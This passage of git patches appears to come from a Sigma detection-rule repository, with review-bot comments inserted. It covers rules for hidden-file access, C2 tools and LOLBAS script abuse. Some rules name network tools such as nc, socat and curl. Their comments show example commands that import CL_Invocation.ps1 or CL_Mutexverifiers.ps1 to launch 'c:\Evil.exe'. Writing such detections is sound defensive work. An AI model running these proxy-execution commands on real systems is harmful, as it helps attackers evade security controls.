'wmic.exe' + - Description: 'WMI Commandline Utility' + selection3: + - ParentPrcessName|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 +falsepositives: +- Unknown +level: high From bba66ca762126855406e3851753fe844376babe1 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Tue, 7 Sep 2021 07:57:50 +0200 Subject: [PATCH 0761/1367] Update lnx_auditd_hidden_files_directories.yml Updating arguments section --- rules/linux/auditd/lnx_auditd_hidden_files_directories.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml index ec1dac52..629d40c9 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml @@ -20,8 +20,10 @@ detection: - nano - vi arguments: - - a1|re: '\.(.*)' - - a2|re: '\.(.*)' # in case there are some other arguments being used in a1 + - a1|contains: '/.' + - a1|startswith: '.' + - a2|contains: '/.' + - a2|startswith: '.' condition: commands and arguments tags: - attack.defense_evasion From 33be089ea2acd6ce36e971fe2af8b6119fdaa42b Mon Sep 17 00:00:00 2001 
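Review bot: The four new `arguments` entries match any relative path component, not only hidden files: `a1|startswith: '.'` is true for `./run.sh` and `..`, and `a1|contains: '/.'` is true for `src/../conf`, so routine use of the listed editors and viewers (`nano`, `vi` are visible as context above the hunk) with relative paths will fire the rule. The dropped `\.(.*)` regex had the same weakness, so this is not a regression, but the entries are a list of maps and therefore OR-ed, meaning each one is sufficient on its own and any narrowing has to come from a separate filter selection in the `condition` rather than from these values. The `falsepositives` section (outside the hunk) should state this, e.g. `- Relative paths such as ./file or ../dir in the first two arguments`. The old comment explaining why `a2` is checked was removed with the regex line; keeping a one-line reason next to the `a2` entries, such as `# a2 covers the case where a1 is an option flag`, preserves that intent. If the collection pipeline does not decode auditd's hex-encoded `a1`/`a2` values (used when an argument contains spaces or special characters), `startswith`/`contains` on the raw field will presumably miss those events; worth confirming against the log source.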
From: Florian Roth Date: Tue, 7 Sep 2021 09:16:35 +0200 Subject: [PATCH 0762/1367] fix: filename to lowercase --- .../auditd/lnx_auditd_susp_c2_commands.yml | 21 ++++++++++++++ .../powershell_cl_Invocation_lolscript.yml | 27 +++++++++++++++++ .../powershell_cl_Invocation_lolscript_v2.yml | 29 +++++++++++++++++++ ...powershell_cl_Mutexverifiers_lolscript.yml | 27 +++++++++++++++++ ...ershell_cl_Mutexverifiers_lolscript_v2.yml | 29 +++++++++++++++++++ 5 files changed, 133 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_susp_c2_commands.yml create mode 100644 rules/windows/powershell/powershell_cl_Invocation_lolscript.yml create mode 100644 rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml create mode 100644 rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml create mode 100644 rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml diff --git a/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml b/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml new file mode 100644 index 00000000..8b145606 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml 
@@ -0,0 +1,21 @@ +title: Suspicious C2 Activities +id: f7158a64-6204-4d6d-868a-6e6378b467e0 +status: experimental +description: Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) +author: Marie Euler +references: + - 'https://github.com/Neo23x0/auditd' +date: 2020/05/18 +logsource: + product: linux + service: auditd +detection: + selection: + key: + - 'susp_activity' + condition: selection +falsepositives: + - Admin or User activity +level: medium +tags: + - attack.command_and_control \ No newline at end of file diff --git a/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml b/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml new file mode 100644 index 00000000..3976c19f --- /dev/null +++ b/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml @@ -0,0 +1,27 @@ +title: Execution via CL_Invocation.ps1 +id: 4cd29327-685a-460e-9dac-c3ab96e549dc +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml + - https://twitter.com/bohops/status/948061991012327424 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection: + EventID: 4104 + ScriptBlockText|contains|all: + - 'CL_Invocation.ps1' + - 'SyncInvoke' + condition: selection +falsepositives: + - Unknown +level: high 
diff --git a/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml new file mode 100644 index 00000000..5cd1d3ad --- /dev/null +++ b/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml @@ -0,0 +1,29 @@ +title: Execution via CL_Invocation.ps1 (2 Lines) +id: f588e69b-0750-46bb-8f87-0e9320d57536 +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml + - https://twitter.com/bohops/status/948061991012327424 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection2: + EventID: 4104 + ScriptBlockText|contains: + - 'CL_Invocation.ps1' + - 'SyncInvoke' + condition: selection2 | count(ScriptBlockText) by Computer > 2 + # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 + # PS > SyncInvoke c:\Evil.exe +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml new file mode 100644 index 00000000..a9e742a2 --- /dev/null +++ b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml 
@@ -0,0 +1,27 @@ +title: Execution via CL_Mutexverifiers.ps1 +id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml + - https://twitter.com/pabraeken/status/995111125447577600 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection: + EventID: 4104 + ScriptBlockText|contains|all: + - 'CL_Mutexverifiers.ps1' + - 'runAfterCancelProcess' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml new file mode 100644 index 00000000..8a0fa3a3 --- /dev/null +++ b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml 
@@ -0,0 +1,29 @@ +title: Execution via CL_Mutexverifiers.ps1 (2 Lines) +id: 6609c444-9670-4eab-9636-fe4755a851ce +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml + - https://twitter.com/pabraeken/status/995111125447577600 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection2: + EventID: 4104 + ScriptBlockText|contains: + - 'CL_Mutexverifiers.ps1' + - 'runAfterCancelProcess' + condition: selection2 | count(ScriptBlockText) by Computer > 2 + # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 + # PS > runAfterCancelProcess c:\Evil.exe +falsepositives: + - Unknown +level: high From 0cce1c0245ab3cbe29335bf8f91741bbb8e9305e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:17:25 +0200 Subject: [PATCH 0763/1367] fix: missing lowercase chars --- .../powershell_cl_invocation_lolscript.yml | 27 +++++++++++++++++ .../powershell_cl_invocation_lolscript_v2.yml | 29 +++++++++++++++++++ ...powershell_cl_mutexverifiers_lolscript.yml | 27 +++++++++++++++++ ...ershell_cl_mutexverifiers_lolscript_v2.yml | 29 +++++++++++++++++++ 4 files changed, 112 insertions(+) create mode 100644 rules/windows/powershell/powershell_cl_invocation_lolscript.yml create mode 100644 rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml create mode 100644 rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml create mode 100644 rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml 
diff --git a/rules/windows/powershell/powershell_cl_invocation_lolscript.yml b/rules/windows/powershell/powershell_cl_invocation_lolscript.yml new file mode 100644 index 00000000..3976c19f --- /dev/null +++ b/rules/windows/powershell/powershell_cl_invocation_lolscript.yml @@ -0,0 +1,27 @@ +title: Execution via CL_Invocation.ps1 +id: 4cd29327-685a-460e-9dac-c3ab96e549dc +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml + - https://twitter.com/bohops/status/948061991012327424 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection: + EventID: 4104 + ScriptBlockText|contains|all: + - 'CL_Invocation.ps1' + - 'SyncInvoke' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml new file mode 100644 index 00000000..5cd1d3ad --- /dev/null +++ b/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml 
@@ -0,0 +1,29 @@ +title: Execution via CL_Invocation.ps1 (2 Lines) +id: f588e69b-0750-46bb-8f87-0e9320d57536 +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml + - https://twitter.com/bohops/status/948061991012327424 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection2: + EventID: 4104 + ScriptBlockText|contains: + - 'CL_Invocation.ps1' + - 'SyncInvoke' + condition: selection2 | count(ScriptBlockText) by Computer > 2 + # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 + # PS > SyncInvoke c:\Evil.exe +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml new file mode 100644 index 00000000..a9e742a2 --- /dev/null +++ b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml 
@@ -0,0 +1,27 @@ +title: Execution via CL_Mutexverifiers.ps1 +id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml + - https://twitter.com/pabraeken/status/995111125447577600 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection: + EventID: 4104 + ScriptBlockText|contains|all: + - 'CL_Mutexverifiers.ps1' + - 'runAfterCancelProcess' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml new file mode 100644 index 00000000..8a0fa3a3 --- /dev/null +++ b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml 
@@ -0,0 +1,29 @@ +title: Execution via CL_Mutexverifiers.ps1 (2 Lines) +id: 6609c444-9670-4eab-9636-fe4755a851ce +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml + - https://twitter.com/pabraeken/status/995111125447577600 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection2: + EventID: 4104 + ScriptBlockText|contains: + - 'CL_Mutexverifiers.ps1' + - 'runAfterCancelProcess' + condition: selection2 | count(ScriptBlockText) by Computer > 2 + # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 + # PS > runAfterCancelProcess c:\Evil.exe +falsepositives: + - Unknown +level: high From 57bfdc7a028eb7b6dd2a762dfd053ebddb31f8bf Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:19:23 +0200 Subject: [PATCH 0764/1367] fix: more upper case chars --- .../win_cl_invocation_lolscript.yml | 26 +++++++++++++++++++ .../win_cl_mutexverifiers_lolscript.yml | 26 +++++++++++++++++++ 2 files changed, 52 insertions(+) create mode 100644 rules/windows/process_creation/win_cl_invocation_lolscript.yml create mode 100644 rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml diff --git a/rules/windows/process_creation/win_cl_invocation_lolscript.yml b/rules/windows/process_creation/win_cl_invocation_lolscript.yml new file mode 100644 index 00000000..04a8b5dd --- /dev/null +++ b/rules/windows/process_creation/win_cl_invocation_lolscript.yml 
@@ -0,0 +1,26 @@ +title: Execution via CL_Invocation.ps1 +id: a0459f02-ac51-4c09-b511-b8c9203fc429 +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml + - https://twitter.com/bohops/status/948061991012327424 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'CL_Invocation.ps1' + - 'SyncInvoke' + # Example Commandline: "powershell Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1; SyncInvoke c:\Evil.exe" + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml b/rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml new file mode 100644 index 00000000..4fd2f44c --- /dev/null +++ b/rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml 
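Review bot: The two process_creation rules created in this commit (this hunk and the `CL_Mutexverifiers.ps1` one that follows) get fresh ids but no `related:` block pointing at their script-block-logging siblings, whereas the later `Split global rules` commit on this page links every derived rule with `related: - id: <sibling id> type: derived`; for this file that would be `related: - id: 4cd29327-685a-460e-9dac-c3ab96e549dc type: derived`, which keeps the rule family discoverable. `modified: 2021/05/21` also predates the creation of this file in this commit, so it should be bumped to the commit date as the other rules touched in this series are.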
@@ -0,0 +1,26 @@ +title: Execution via CL_Mutexverifiers.ps1 +id: 99465c8f-f102-4157-b11c-b0cddd53b79a +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2021/05/21 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml + - https://twitter.com/pabraeken/status/995111125447577600 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'CL_Mutexverifiers.ps1' + - 'runAfterCancelProcess' + # Example Commandline: "powershell Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1; runAfterCancelProcess c:\Evil.exe" + condition: selection +falsepositives: + - Unknown +level: high From 8b4fce3473e761633e737b9d18c6f04ba1338ac1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:21:44 +0200 Subject: [PATCH 0765/1367] removed unneeded upper ticks --- rules/windows/powershell/powershell_cl_Invocation_lolscript.yml | 2 +- .../powershell/powershell_cl_Mutexverifiers_lolscript.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml b/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml index 3976c19f..054cd341 100644 --- a/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml +++ b/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml index a9e742a2..3430cdd7 100644 
--- a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml +++ b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 From a8d8d878a04c8b1a7f77dcc88609b81485b73c8a Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:27:11 +0200 Subject: [PATCH 0766/1367] remove uppercase files --- .../powershell_cl_Invocation_lolscript.yml | 27 ----------------- .../powershell_cl_Invocation_lolscript_v2.yml | 29 ------------------- ...powershell_cl_Mutexverifiers_lolscript.yml | 27 ----------------- ...ershell_cl_Mutexverifiers_lolscript_v2.yml | 29 ------------------- 4 files changed, 112 deletions(-) delete mode 100644 rules/windows/powershell/powershell_cl_Invocation_lolscript.yml delete mode 100644 rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml delete mode 100644 rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml delete mode 100644 rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml diff --git a/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml b/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml deleted file mode 100644 index 054cd341..00000000 --- a/rules/windows/powershell/powershell_cl_Invocation_lolscript.yml +++ /dev/null 
@@ -1,27 +0,0 @@ -title: Execution via CL_Invocation.ps1 -id: 4cd29327-685a-460e-9dac-c3ab96e549dc -description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml - - https://twitter.com/bohops/status/948061991012327424 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: Script block logging must be enabled -detection: - selection: - EventID: 4104 - ScriptBlockText|contains|all: - - 'CL_Invocation.ps1' - - 'SyncInvoke' - condition: selection -falsepositives: - - Unknown -level: high diff --git a/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml deleted file mode 100644 index 5cd1d3ad..00000000 --- a/rules/windows/powershell/powershell_cl_Invocation_lolscript_v2.yml +++ /dev/null @@ -1,29 +0,0 @@ -title: Execution via CL_Invocation.ps1 (2 Lines) -id: f588e69b-0750-46bb-8f87-0e9320d57536 -description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml - - https://twitter.com/bohops/status/948061991012327424 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: 'Script block logging must be enabled' -detection: - selection2: - EventID: 4104 - ScriptBlockText|contains: - - 'CL_Invocation.ps1' - - 'SyncInvoke' - condition: selection2 | count(ScriptBlockText) by Computer > 2 - # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - # PS > SyncInvoke c:\Evil.exe -falsepositives: - - Unknown -level: high 
diff --git a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml deleted file mode 100644 index 3430cdd7..00000000 --- a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript.yml +++ /dev/null @@ -1,27 +0,0 @@ -title: Execution via CL_Mutexverifiers.ps1 -id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 -description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml - - https://twitter.com/pabraeken/status/995111125447577600 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: Script block logging must be enabled -detection: - selection: - EventID: 4104 - ScriptBlockText|contains|all: - - 'CL_Mutexverifiers.ps1' - - 'runAfterCancelProcess' - condition: selection -falsepositives: - - Unknown -level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml deleted file mode 100644 index 8a0fa3a3..00000000 --- a/rules/windows/powershell/powershell_cl_Mutexverifiers_lolscript_v2.yml +++ /dev/null 
@@ -1,29 +0,0 @@ -title: Execution via CL_Mutexverifiers.ps1 (2 Lines) -id: 6609c444-9670-4eab-9636-fe4755a851ce -description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml - - https://twitter.com/pabraeken/status/995111125447577600 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: 'Script block logging must be enabled' -detection: - selection2: - EventID: 4104 - ScriptBlockText|contains: - - 'CL_Mutexverifiers.ps1' - - 'runAfterCancelProcess' - condition: selection2 | count(ScriptBlockText) by Computer > 2 - # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - # PS > runAfterCancelProcess c:\Evil.exe -falsepositives: - - Unknown -level: high From 3a305e82b9b2e38c088bc018a48d8cb593c6a956 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 09:28:20 +0200 Subject: [PATCH 0767/1367] fix: remove renamed files --- .../powershell_cl_invocation_lolscript_v2.yml | 29 ------------------- ...ershell_cl_mutexverifiers_lolscript_v2.yml | 29 ------------------- 2 files changed, 58 deletions(-) delete mode 100644 rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml delete mode 100644 rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml diff --git a/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml deleted file mode 100644 index 5cd1d3ad..00000000 --- a/rules/windows/powershell/powershell_cl_invocation_lolscript_v2.yml +++ /dev/null 
@@ -1,29 +0,0 @@ -title: Execution via CL_Invocation.ps1 (2 Lines) -id: f588e69b-0750-46bb-8f87-0e9320d57536 -description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml - - https://twitter.com/bohops/status/948061991012327424 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: 'Script block logging must be enabled' -detection: - selection2: - EventID: 4104 - ScriptBlockText|contains: - - 'CL_Invocation.ps1' - - 'SyncInvoke' - condition: selection2 | count(ScriptBlockText) by Computer > 2 - # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - # PS > SyncInvoke c:\Evil.exe -falsepositives: - - Unknown -level: high diff --git a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml deleted file mode 100644 index 8a0fa3a3..00000000 --- a/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_v2.yml +++ /dev/null 
@@ -1,29 +0,0 @@ -title: Execution via CL_Mutexverifiers.ps1 (2 Lines) -id: 6609c444-9670-4eab-9636-fe4755a851ce -description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module -status: experimental -author: oscd.community, Natalia Shornikova -date: 2020/10/14 -modified: 2021/05/21 -references: - - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml - - https://twitter.com/pabraeken/status/995111125447577600 -tags: - - attack.defense_evasion - - attack.t1216 -logsource: - product: windows - service: powershell - definition: 'Script block logging must be enabled' -detection: - selection2: - EventID: 4104 - ScriptBlockText|contains: - - 'CL_Mutexverifiers.ps1' - - 'runAfterCancelProcess' - condition: selection2 | count(ScriptBlockText) by Computer > 2 - # PS > Import-Module c:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - # PS > runAfterCancelProcess c:\Evil.exe -falsepositives: - - Unknown -level: high From cfbde22d2d1a6f082f7c866ac97ad1d8bdef3184 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 7 Sep 2021 10:10:14 +0200 Subject: [PATCH 0768/1367] rule: PRIVATELOG image load --- .../image_load/win_susp_svchost_clfsw32.yml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 rules/windows/image_load/win_susp_svchost_clfsw32.yml diff --git a/rules/windows/image_load/win_susp_svchost_clfsw32.yml b/rules/windows/image_load/win_susp_svchost_clfsw32.yml new file mode 100644 index 00000000..2a58dabc --- /dev/null +++ b/rules/windows/image_load/win_susp_svchost_clfsw32.yml 
@@ -0,0 +1,19 @@
+title: APT PRIVATELOG Image Load Pattern
+id: 33a2d1dd-f3b0-40bd-8baf-7974468927cc
+status: experimental
+description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
+references:
+ - https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
+author: Florian Roth
+date: 2021/09/07
+logsource:
+ category: image_load
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\svchost.exe'
+ ImageLoaded|endswith: '\clfsw32.dll'
+ condition: selection
+falsepositives:
+ - Rarely observed
+level: high
From 0e5e4fa19d9f797d0cb6f6a55e429df1e209dedf Mon Sep 17 00:00:00 2001
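Review bot: The new rule has no `tags:` section, so it carries no ATT&CK mapping while every other rule on this page has one and a later commit in this series (`add missing tags`) exists precisely to fix that elsewhere; add a `tags:` block with the techniques the referenced FireEye write-up attributes to this activity. `falsepositives: - Rarely observed` states a frequency rather than a source of benign matches; if no legitimate loader of `clfsw32.dll` into `svchost.exe` is known, `- Unknown` is the conventional value. `Image|endswith: '\svchost.exe'` also matches a copy of the binary outside `System32`, which is presumably intentional and worth a one-line comment so it is not later tightened away.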
From: frack113 Date: Tue, 7 Sep 2021 13:30:32 +0200 Subject: [PATCH 0769/1367] Split global rules --- .../powershell_classic_powercat.yml | 31 +++++++++++ ...usp_athremotefxvgpudisablementcommand.yml} | 54 +++++-------------- .../powershell_classic_susp_zip_compress.yml} | 40 +++----------- .../powershell/powershell_powercat.yml | 24 ++------- ...susp_athremotefxvgpudisablementcommand.yml | 37 +++++++++++++ .../powershell_susp_zip_compress.yml | 28 ++++++++++ ...susp_athremotefxvgpudisablementcommand.yml | 37 +++++++++++++ .../process_creation_susp_zip_compress.yml | 29 ++++++++++ ...l => sysmon_config_modification_error.yml} | 25 +++------ .../sysmon_config_modification_status.yml | 25 +++++++++ 10 files changed, 219 insertions(+), 111 deletions(-) create mode 100644 rules/windows/powershell/powershell_classic_powercat.yml rename rules/windows/{builtin/win_susp_athremotefxvgpudisablementcommand.yml => powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml} (56%) rename rules/windows/{builtin/win_susp_zip_compress.yml => powershell/powershell_classic_susp_zip_compress.yml} (54%) create mode 100644 rules/windows/powershell/powershell_susp_athremotefxvgpudisablementcommand.yml create mode 100644 rules/windows/powershell/powershell_susp_zip_compress.yml create mode 100644 rules/windows/process_creation/process_creation_susp_athremotefxvgpudisablementcommand.yml create mode 100644 rules/windows/process_creation/process_creation_susp_zip_compress.yml rename rules/windows/sysmon/{sysmon_config_modification.yml => sysmon_config_modification_error.yml} (66%) create mode 100644 